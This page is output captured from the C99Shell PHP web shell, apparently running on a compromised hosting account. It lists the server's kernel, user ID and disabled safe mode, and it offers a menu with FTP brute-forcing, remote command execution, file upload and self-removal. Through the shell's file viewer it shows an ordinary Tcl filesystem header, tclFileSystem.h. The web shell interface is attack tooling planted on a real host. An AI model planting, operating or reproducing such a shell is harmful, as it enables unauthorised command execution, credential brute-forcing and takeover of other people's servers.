!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/include/tcl-private/generic/   drwxr-xr-x
Free 6182.21 GB of 6263.41 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tclFileSystem.h (2.4 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 * tclFileSystem.h --
 *
 *    This file contains the common defintions and prototypes for use by
 *    Tcl's filesystem and path handling layers.
 *
 * Copyright (c) 2003 Vince Darley.
 *
 * See the file "license.terms" for information on usage and redistribution of
 * this file, and for a DISCLAIMER OF ALL WARRANTIES.
 */

#ifndef _TCLFILESYSTEM
#define _TCLFILESYSTEM

#include "tcl.h"

/*
 * The internal TclFS API provides routines for handling and manipulating
 * paths efficiently, taking direct advantage of the "path" Tcl_Obj type.
 *
 * These functions are not exported at all at present.
 */

MODULE_SCOPE int    TclFSCwdPointerEquals(Tcl_Obj **pathPtrPtr);
MODULE_SCOPE int    TclFSNormalizeToUniquePath(Tcl_Interp *interp,
                Tcl_Obj *pathPtr, int startAt);
MODULE_SCOPE Tcl_Obj *    TclFSMakePathRelative(Tcl_Interp *interp,
                Tcl_Obj *pathPtr, Tcl_Obj *cwdPtr);
MODULE_SCOPE int    TclFSEnsureEpochOk(Tcl_Obj *pathPtr,
                const Tcl_Filesystem **fsPtrPtr);
MODULE_SCOPE void    TclFSSetPathDetails(Tcl_Obj *pathPtr,
                const Tcl_Filesystem *fsPtr, ClientData clientData);
MODULE_SCOPE Tcl_Obj *    TclFSNormalizeAbsolutePath(Tcl_Interp *interp,
                Tcl_Obj *pathPtr);
MODULE_SCOPE size_t    TclFSEpoch(void);

/*
 * Private shared variables for use by tclIOUtil.c and tclPathObj.c
 */

MODULE_SCOPE const Tcl_Filesystem tclNativeFilesystem;

/*
 * Private shared functions for use by tclIOUtil.c, tclPathObj.c and
 * tclFileName.c, and any platform-specific filesystem code.
 */

MODULE_SCOPE Tcl_PathType TclFSGetPathType(Tcl_Obj *pathPtr,
                const Tcl_Filesystem **filesystemPtrPtr,
                int *driveNameLengthPtr);
MODULE_SCOPE Tcl_PathType TclFSNonnativePathType(const char *pathPtr,
                int pathLen, const Tcl_Filesystem **filesystemPtrPtr,
                int *driveNameLengthPtr, Tcl_Obj **driveNameRef);
MODULE_SCOPE Tcl_PathType TclGetPathType(Tcl_Obj *pathPtr,
                const Tcl_Filesystem **filesystemPtrPtr,
                int *driveNameLengthPtr, Tcl_Obj **driveNameRef);
MODULE_SCOPE int    TclFSEpochOk(size_t filesystemEpoch);
MODULE_SCOPE int    TclFSCwdIsNative(void);
MODULE_SCOPE Tcl_Obj *    TclWinVolumeRelativeNormalize(Tcl_Interp *interp,
                const char *path, Tcl_Obj **useThisCwdPtr);

MODULE_SCOPE Tcl_FSPathInFilesystemProc TclNativePathInFilesystem;
MODULE_SCOPE Tcl_FSCreateInternalRepProc TclNativeCreateNativeRep;

#endif /* _TCLFILESYSTEM */

/*
 * Local Variables:
 * mode: c
 * c-basic-offset: 4
 * fill-column: 78
 * End:
 */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0104 ]--